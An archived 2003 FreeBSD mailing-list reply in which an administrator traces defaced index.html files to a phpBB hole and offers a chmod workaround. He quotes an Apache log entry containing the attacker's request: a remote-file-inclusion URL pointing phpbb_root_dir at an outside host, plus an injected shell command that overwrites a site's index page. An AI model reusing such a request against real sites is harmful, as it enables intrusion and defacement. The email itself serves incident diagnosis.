From owner-freebsd-stable@FreeBSD.ORG Fri Nov 7 04:28:53 2003 Return-Path: Delivered-To: freebsd-stable@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id C675116A4CE; Fri, 7 Nov 2003 04:28:53 -0800 (PST) Received: from aurora.zrcalo.si (aurora.zrcalo.si [213.161.20.103]) by mx1.FreeBSD.org (Postfix) with ESMTP id 83CA543FE0; Fri, 7 Nov 2003 04:28:52 -0800 (PST) (envelope-from mike@voyager.unix-systems.net) Received: from localhost (localhost.zrcalo.si [127.0.0.1]) by aurora.zrcalo.si (Postfix) with ESMTP id A409422EAB; Fri, 7 Nov 2003 13:29:08 +0100 (CET) Received: from voyager.zrcalo.si (voyager.zrcalo.si [213.161.20.104]) by aurora.zrcalo.si (Postfix) with ESMTP id 4F9B022EA6; Fri, 7 Nov 2003 13:29:07 +0100 (CET) Received: by voyager.zrcalo.si (Postfix, from userid 1001) id 56BD851602; Fri, 7 Nov 2003 13:30:50 +0100 (CET) Received: from localhost (localhost [127.0.0.1]) by voyager.zrcalo.si (Postfix) with ESMTP id 53CD2A6A01; Fri, 7 Nov 2003 13:30:50 +0100 (CET) Date: Fri, 7 Nov 2003 13:30:50 +0100 (CET) From: Miha Nedok X-X-Sender: mike@voyager.zrcalo.si To: Marco Trentini In-Reply-To: <3FAB8B3A.7020908@remotelab.org> Message-ID: <20031107132650.H19165@voyager.zrcalo.si> References: <20031107125529.R19165@voyager.zrcalo.si> <3FAB8B3A.7020908@remotelab.org> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-Virus-Scanned: by AMaViS perl-11 - mx-master.zrcalo.si cc: stable@freebsd.org cc: security@freebsd.org Subject: Re: hack ? - urgent - false FreeBSD alarm X-BeenThere: freebsd-stable@freebsd.org X-Mailman-Version: 2.1.1 Precedence: list List-Id: Production branch of FreeBSD source code List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Fri, 07 Nov 2003 12:28:53 -0000 Hi ! It is phpBB related. I found in logs: 200.211.35.130 - - [07/Nov/2003:11:27:01 +0100] "GET /forum/install.php?phpbb_root_dir=http://www.creatividade.hpg.com.br/&cmd=cd%20..;cd%20..;cd%20www.site- name.si;echo%20IR4DEX%20ownz%20you%20FreeBSD%20-%20contato:%20ir4dex@hotmail.com%20>%20index.html HTTP/1.1" 200 904 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" I just did chmod 000 `find -name 'install.php'` for a workaround. Apache is latest: Nov 3 18:08 apache+mod_ssl-1.3.28+2.8.15_2 . -Miha On Fri, 7 Nov 2003, Marco Trentini wrote: > Date: Fri, 07 Nov 2003 13:08:26 +0100 > From: Marco Trentini > To: Miha Nedok > Cc: security@freebsd.org, stable@freebsd.org > Subject: Re: hack ? - urgent > > Miha Nedok wrote: > > Hi ! > > > > Today I have noticed some modified index.html files on some of our vhosts. > > Is it Apache related ? Does anyone know about this ? > > > > The content is following: > > IR4DEX ownz you FreeBSD - contato: ir4dex@hotmail.com > > Is your apache version update? > > Maybe IR4DEX knows more about it :) > > -- > Marco Trentini mark@remotelab.org > http://www.remotelab.org/ >